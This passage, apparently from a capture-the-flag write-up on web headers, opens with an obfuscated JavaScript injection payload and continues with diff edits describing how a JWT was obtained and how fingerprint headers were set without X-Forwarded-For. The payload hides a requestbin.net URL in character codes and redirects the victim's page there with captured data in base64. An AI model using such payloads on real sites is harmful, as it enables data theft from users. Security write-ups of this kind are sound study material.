Tags: web headers

 function f(){a=[104,116,116,112,58,47,47,114,101,113,117,101,115,116,98,105,110,46,110,101,116,47,114,47,49,55,122,50,101,117,56,49,63,99,61];s=a.map(function(c){return String.fromCharCode(c)}).join([]);location=s+btoa(t);}t=`;f()//

-Now, finally, this is nearly all there was to it: after getting the JWT by serving the supplied [index.html](./index.html),
+Now, finally, this is nearly all there was to it: after getting the JWT by serving the supplied index.html, we run request.py which sets the headers needed for the fingerprint.

-The last step frustrated us somewhat, as we hadn't considered that we might not need `X-Forwarded-For`.
+The last step frustrated us somewhat, as we hadn't considered that we might not need X-Forwarded-For

-Sending what we got in `requestbin` would break the fingerprint, and the correct solution turned out to be omitting it.
+would break the fingerprint, and the correct solution turned out to be omitting it.